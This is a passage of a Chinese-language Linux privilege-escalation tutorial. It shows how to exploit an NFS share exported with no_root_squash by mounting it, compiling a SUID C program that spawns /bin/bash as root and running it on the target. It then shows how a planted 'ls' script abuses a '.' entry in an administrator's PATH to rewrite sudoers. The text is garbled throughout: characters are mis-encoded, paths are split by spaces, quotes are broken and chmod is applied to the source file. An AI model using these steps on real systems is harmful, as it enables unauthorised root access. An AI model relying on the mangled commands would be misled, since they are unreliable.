NFS是基于UDP/IP協(xié)議的應(yīng)用，其實現(xiàn)主要是采用遠(yuǎn)程過程調(diào)用RPC機(jī)制，RPC提供了一組與機(jī)器、操作系統(tǒng)以及低層傳送協(xié)議無關(guān)的存取遠(yuǎn)程文件的操作。RPC采用了XDR的支持。XDR是一種與機(jī)器無關(guān)的數(shù)據(jù)描述編碼的協(xié)議，他以獨(dú)立與任意機(jī)器體系結(jié)構(gòu)的格式對網(wǎng)上傳送的數(shù)據(jù)進(jìn)行編碼和解碼，支持在異構(gòu)系統(tǒng)之間數(shù)據(jù)的傳送。

什么是root_sqaush和no_root_sqaush？

Root Squashing（root_sqaush）參數(shù)阻止對連接到NFS卷的遠(yuǎn)程root用戶具有root訪問權(quán)限。遠(yuǎn)程根用戶在連接時會分配一個用戶“?nfsnobody”，它具有最少的本地特權(quán)。如果no_root_squash選項開啟的話”，并為遠(yuǎn)程用戶授予root用戶對所連接系統(tǒng)的訪問權(quán)限。在配置NFS驅(qū)動器時，系統(tǒng)管理員應(yīng)始終使用“ root_squash”參數(shù)。

注意：要利用此，**no_root_squash選項得開啟**。

利用NFS并獲取Root Shell

現(xiàn)在，我們拿到了一個低權(quán)限的shell，我們查看“ / etc / exports ”文件。

/ etc / exports文件包含將哪些文件夾/文件系統(tǒng)導(dǎo)出到遠(yuǎn)程用戶的配置和權(quán)限。

這個文件的內(nèi)容非常簡單，每一行由拋出路徑，客戶名列表以及每個客戶名后緊跟的訪問選項構(gòu)成：[共享的目錄] [主機(jī)名或IP(參數(shù),參數(shù))]其中參數(shù)是可選的，當(dāng)不指定參數(shù)時，nfs將使用默認(rèn)選項。默認(rèn)的共享選項是 sync,ro,root_squash,no_delay。當(dāng)主機(jī)名或IP地址為空時，則代表共享給任意客戶機(jī)提供服務(wù)。當(dāng)將同一目錄共享給多個客戶機(jī)，但對每個客戶機(jī)提供的權(quán)限不同時，可以這樣：[共享的目錄] [主機(jī)名1或IP1(參數(shù)1,參數(shù)2)] [主機(jī)名2或IP2(參數(shù)3,參數(shù)4)]

我們可以看到/ tmp?文件夾是可共享的，遠(yuǎn)程用戶可以掛載它。還有不安全的參數(shù)“ rw ”（讀，寫），“ sync ”和“?no_root_squash”

同樣我們也可以使用 showmount命令來查看。

showmount命令用于查詢NFS服務(wù)器的相關(guān)信息

showmount —help

Usage: showmount [-adehv]

[—all] [—directories] [—exports]

[—no-headers] [—help] [—version] [host] -a或—all

以 host:dir 這樣的格式來顯示客戶主機(jī)名和掛載點(diǎn)目錄。

-d或—directories ? ?僅顯示被客戶掛載的目錄名。

-e或—exports ? ?顯示NFS服務(wù)器的輸出清單。

-h或—help ? ?顯示幫助信息。

-v或—version ? ?顯示版本信。

—no-headers ? ?禁止輸出描述頭部信息。顯示NFS客戶端信息 #

showmount 顯示指定NFS服務(wù)器連接NFS客戶端的信息

?

# showmount 192.168.1.1  #此ip為nfs服務(wù)器的 顯示輸出目錄列表


# showmount -e 顯示指定NFS服務(wù)器輸出目錄列表（也稱為共享目錄列表）


# showmount -e 192.168.1.1 顯示被掛載的共享目錄


# showmount -d   顯示客戶端信息和共享目錄


# showmount -a 顯示指定NFS服務(wù)器的客戶端信息和共享目錄


# showmount -a 192.168.1.1

?

這里不多說了

我們接下來在我們的攻擊機(jī)上安裝客戶端工具

需要執(zhí)行以下命令，安裝nfs-common軟件包。apt會自動安裝nfs-common、rpcbind等12個軟件包

sudo apt install nfs-commonapt-get install cifs-utils

然后輸入命令

showmount -e [IP地址]

創(chuàng)建目錄以掛載遠(yuǎn)程系統(tǒng)。

mkdir / tmp / test

在**/tmp/test上裝載Remote/tmp**文件夾：

mount -o rw，vers = 2 [IP地址]：/ tmp / tmp / test

然后在/tmp/test/中。新建一個c文件。

?

#include 


#include 


#include 


#include  int main() { setuid(0); system("/bin/bash"); return 0; }

?

也可以

echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash”); return 0; }’ > /tmp/test/suid-shell.c

編譯：

gcc /tmp/test/suid-shell.c -o / tmp / 1 / suid-shel

賦權(quán)：

chmod + s /tmp/test/suid-shell.c

好的，我們回到要提權(quán)的服務(wù)器上

cd / tmp./suid-shell

可以看到是ROOT權(quán)限了

0x0010 linux提權(quán)-利用“.”路徑配置錯誤

有“.” 在PATH中表示用戶可以從當(dāng)前目錄執(zhí)行二進(jìn)制文件/腳本。但是一些管理員為了避免每次都必須輸入這兩個額外的字符，他們在用戶中添加“?！痹谒麄兊腜ATH中。對于攻擊者而言，這是提升其特權(quán)的絕佳方法。

放置.路徑

如果在PATH中放置點(diǎn)，則無需編寫./binary即可執(zhí)行它。那么我們將能夠執(zhí)行當(dāng)前目錄中的任何腳本或二進(jìn)制文件。

假設(shè)小明是管理員，而她添加了“?！?在她的PATH上，這樣她就不必再輸入兩個字符了去執(zhí)行腳本或二進(jìn)制文件。

帶“。” 在路徑中–program

不帶“?！?在路徑中-./program

發(fā)生這種情況是因為Linux首先在“.”位置搜索程序。但是添加到PATH的開頭后，就在其他任何地方搜索。

另一個用戶“小白”知道小明添加了“.” 在PATH中，

小白告訴小明’ls’命令在他的目錄中不起作用

小白在他的目錄中添加代碼，這將更改sudoers文件并使他成為管理員

小白將該代碼存儲在名為“ ls”并使其可執(zhí)行

小明具有root特權(quán)。她來了，并在小白的主目錄中執(zhí)行了’ls’命令

惡意代碼不是通過原始的’ls’命令而是通過root訪問來執(zhí)行

在另存為“ ls”的文件中，添加了一個代碼，該代碼將打印“ Hello world”

$ PATH = .：$ {PATH} –添加’.’ 在PATH變量中

$ ls –執(zhí)行的./ls文件，而不是運(yùn)行列表命令。

現(xiàn)在，如果root用戶以root特權(quán)執(zhí)行代碼，我們可以使用root特權(quán)實現(xiàn)任意代碼執(zhí)行。